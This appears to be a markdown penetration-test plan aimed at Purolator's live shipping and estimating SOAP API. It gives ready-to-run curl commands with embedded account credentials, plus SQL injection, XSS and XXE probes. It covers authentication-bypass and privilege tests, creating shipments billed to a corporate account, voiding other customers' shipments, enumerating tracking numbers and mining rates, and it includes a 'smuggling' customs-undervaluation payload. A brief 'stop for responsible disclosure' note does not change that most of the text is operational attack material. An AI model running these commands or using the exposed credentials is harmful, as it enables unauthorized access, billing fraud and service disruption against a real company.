# Purolator SOAP API - Precise Attack Surface
## ✅ Confirmed API Operations
### Shipping Service (4 operations)
**Endpoint:** `https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx`
1. **CreateShipment** - Create actual shipments with labels
2. **VoidShipment** - Cancel existing shipments
3. **ValidateShipment** - Validate shipment data before creating
4. **Consolidate** - Consolidate multiple shipments
### Estimating Service (2 operations)
**Endpoint:** `https://webservices.purolator.com/EWS/v2/Estimating/EstimatingService.asmx`
1. **GetQuickEstimate** - Fast rate quotes
2. **GetFullEstimate** - Detailed estimates (captured in use)
---
## 🎯 Precise Test Plan
### Phase 1: Authentication Bypass Test (CRITICAL)
**Goal:** Determine if AWS Signature is actually required
```bash
# Test 1: GetQuickEstimate WITHOUT credentials
curl -X POST https://webservices.purolator.com/EWS/v2/Estimating/EstimatingService.asmx \
-H "Content-Type: text/xml; charset=utf-8" \
-H "SOAPAction: http://purolator.com/pws/service/v2/GetQuickEstimate" \
-d @quick_estimate.xml
# Expected: 401 Unauthorized
# Test 2: GetQuickEstimate WITH Basic Auth only (no AWS sig)
curl -X POST https://webservices.purolator.com/EWS/v2/Estimating/EstimatingService.asmx \
-H "Authorization: Basic MDAwYjk0ZDY2MDFmNGM5NmJhNzVkODQ0MzMxN2EyYTk6eHlBfUZXb0Q=" \
-H "Content-Type: text/xml; charset=utf-8" \
-H "SOAPAction: http://purolator.com/pws/service/v2/GetQuickEstimate" \
-d @quick_estimate.xml
# Expected: AWS error (good) OR success (CRITICAL vulnerability)
```
**quick_estimate.xml:**
```xml
2.0
en
Test
000b94d6601f4c96ba75d8443317a2a9
M5H2N2
Hamilton
ON
CA
L8S4L8
Package
5
lb
```
---
### Phase 2: Privilege Escalation Test
**Goal:** Test if Account credential has more access than Credit Card
```bash
# Test with Credit Card credential
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
-X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
-H "Content-Type: text/xml; charset=utf-8" \
-H "SOAPAction: http://purolator.com/pws/service/v2/ValidateShipment" \
-d @validate_shipment.xml
# Test with Account credential
curl -u "ef7475ef70b44f4687158fbbb9ff3f47:|HXY2).6" \
-X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
-H "Content-Type: text/xml; charset=utf-8" \
-H "SOAPAction: http://purolator.com/pws/service/v2/ValidateShipment" \
-d @validate_shipment.xml
# Compare responses - different permissions?
```
**validate_shipment.xml:**
```xml
2.0
en
ValidationTest
Test Sender
123
Main
Toronto
ON
CA
M5H2N2
1
416
5551234
Test Receiver
456
King
Hamilton
ON
CA
L8S4L8
1
905
5555678
PurolatorExpress
5
lb
1
Sender
000b94d6601f4c96ba75d8443317a2a9
DropOff
```
---
### Phase 3: CreateShipment Test (HIGH RISK)
**Goal:** Test if you can create ACTUAL shipments
**⚠️ WARNING:** This could create real shipments billed to the corporate account!
```bash
# DRY RUN: Use ValidateShipment first
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
-X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
-H "Content-Type: text/xml; charset=utf-8" \
-H "SOAPAction: http://purolator.com/pws/service/v2/ValidateShipment" \
-d @validate_shipment.xml
# If validation succeeds, you COULD create real shipment:
# curl -u "..." CreateShipment ...
# DO NOT RUN unless you want real labels generated!
```
**Impact if successful:**
- Generate valid shipping labels
- Create shipments billed to corporate account
- Obtain tracking numbers
- Financial fraud potential
---
### Phase 4: VoidShipment Test
**Goal:** Test if you can cancel shipments
**Requirements:**
1. Need valid PIN (tracking number)
2. Test if you can void shipments you didn't create
```bash
# Try to void a known shipment PIN
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
-X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
-H "Content-Type: text/xml; charset=utf-8" \
-H "SOAPAction: http://purolator.com/pws/service/v2/VoidShipment" \
-d @void_shipment.xml
```
**void_shipment.xml:**
```xml
2.0
en
VoidTest
520127751300
```
**Risk:** Can you disrupt operations by voiding legitimate shipments?
---
### Phase 5: Data Enumeration Test
**Goal:** Test for insecure direct object reference (IDOR)
**5.1 Sequential PIN Testing:**
```bash
# Try sequential tracking numbers
for i in {520127751300..520127751310}; do
echo "Testing PIN: $i"
curl -u "..." VoidShipment -d "$i" | grep -i "error\|success"
done
```
**5.2 Rate Structure Mining:**
```bash
# Query all postal code combinations
for from_postal in M5H2N2 M5J2N8 M5K1B2; do
for to_postal in L8S4L8 L8N3Y1 L8P4R1; do
echo "Testing: $from_postal -> $to_postal"
curl -u "..." GetQuickEstimate ...
done
done
```
**Impact:**
- Map complete rate structure
- Discover corporate shipping patterns
- Competitive intelligence
---
### Phase 6: Input Validation Fuzzing
**Goal:** Find injection vulnerabilities
**6.1 SQL Injection Test:**
```xml
000b94d6601f4c96ba75d8443317a2a9' OR '1'='1
M5H2N2'; DROP TABLE shipments;--
```
**6.2 XML Injection Test:**
```xml
Test
<script>alert(1)</script>
```
**6.3 XXE (XML External Entity) Test:**
```xml
]>
&xxe;
```
**6.4 Boundary Value Testing:**
```xml
-999999
999999999
0
999999
```
---
### Phase 7: Business Logic Abuse
**7.1 Free Shipping Test:**
```xml
Receiver
```
**7.2 International Smuggling:**
```xml
Harmless Item
9999999
0.01
```
**7.3 Rate Arbitrage:**
```xml
1
```
---
## 🎪 Expected Vulnerabilities (Ranked by Severity)
### CRITICAL (9.0-10.0)
1. **Unauthenticated API Access**
- **Test:** Phase 1
- **If:** Basic Auth alone works (no AWS sig)
- **Impact:** Complete unauthorized access to shipping platform
2. **Unauthorized Shipment Creation**
- **Test:** Phase 3
- **If:** CreateShipment succeeds
- **Impact:** Financial fraud, generate valid labels, ship packages on corporate account
3. **IDOR - Access Other Shipments**
- **Test:** Phase 5.1
- **If:** Can void/query shipments not created by you
- **Impact:** Data leakage, service disruption
### HIGH (7.0-8.9)
4. **Business Logic - Free Shipping**
- **Test:** Phase 7.1
- **If:** Can bill receiver without authorization
- **Impact:** Financial abuse
5. **Rate Structure Extraction**
- **Test:** Phase 5.2
- **If:** Unlimited queries allowed
- **Impact:** Competitive intelligence, pricing leakage
6. **Input Validation - SQL Injection**
- **Test:** Phase 6.1
- **If:** SQL errors or unauthorized data returned
- **Impact:** Database compromise
### MEDIUM (4.0-6.9)
7. **XXE / XML Injection**
- **Test:** Phase 6.3
- **If:** External entities processed
- **Impact:** File disclosure, SSRF
8. **Boundary Value Bugs**
- **Test:** Phase 6.4
- **If:** Crashes, errors, or unexpected behavior
- **Impact:** DoS, data corruption
---
## ⚡ Quick Win Commands
**Test 1 - Does Basic Auth work?**
```bash
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
"https://webservices.purolator.com/EWS/v2/Estimating/EstimatingService.asmx?WSDL" \
> /dev/null && echo "✅ Auth works" || echo "❌ Auth failed"
```
**Test 2 - Can you validate shipments?**
```bash
curl -u "000b94d6601f4c96ba75d8443317a2a9:xyA}FWoD" \
-X POST https://webservices.purolator.com/EWS/v2/Shipping/ShippingService.asmx \
-H "Content-Type: text/xml; charset=utf-8" \
-H "SOAPAction: http://purolator.com/pws/service/v2/ValidateShipment" \
-d @validate_shipment.xml \
| grep -q "ValidShipment.*true" && echo "✅ Can create shipments!" || echo "❌ Blocked"
```
---
## 📊 Impact Summary
| Vulnerability | Likelihood | Impact | Risk |
|--------------|-----------|---------|------|
| No AWS Sig Required | HIGH | CRITICAL | **CRITICAL** |
| Unauthorized CreateShipment | MEDIUM | CRITICAL | **HIGH** |
| IDOR on Shipments | MEDIUM | HIGH | **HIGH** |
| Rate Mining | HIGH | MEDIUM | **MEDIUM** |
| SQL Injection | LOW | HIGH | **MEDIUM** |
| XXE | LOW | MEDIUM | **LOW** |
---
## 🎯 Recommended Testing Order
1. **Start Safe:** Phase 1 (auth test) - read-only
2. **Validate Access:** Phase 2 (privilege test) - read-only
3. **Test Boundaries:** Phase 6.4 (boundary values) - low risk
4. **⚠️ STOP HERE FOR RESPONSIBLE DISCLOSURE**
5. **DO NOT:** Phase 3 (CreateShipment) - could create real shipments!
6. **DO NOT:** Phase 4 (VoidShipment) - could disrupt operations!
---
## 📝 Documentation Checklist
For each test, record:
- [ ] Request (full curl command)
- [ ] Response (HTTP status + body)
- [ ] Error messages
- [ ] Timing (response time)
- [ ] Any credentials/tokens returned
- [ ] Screenshot/video if GUI involved
**Save everything to:**
- `test_results/phase1_auth_test.txt`
- `test_results/phase2_privilege_test.txt`
- etc.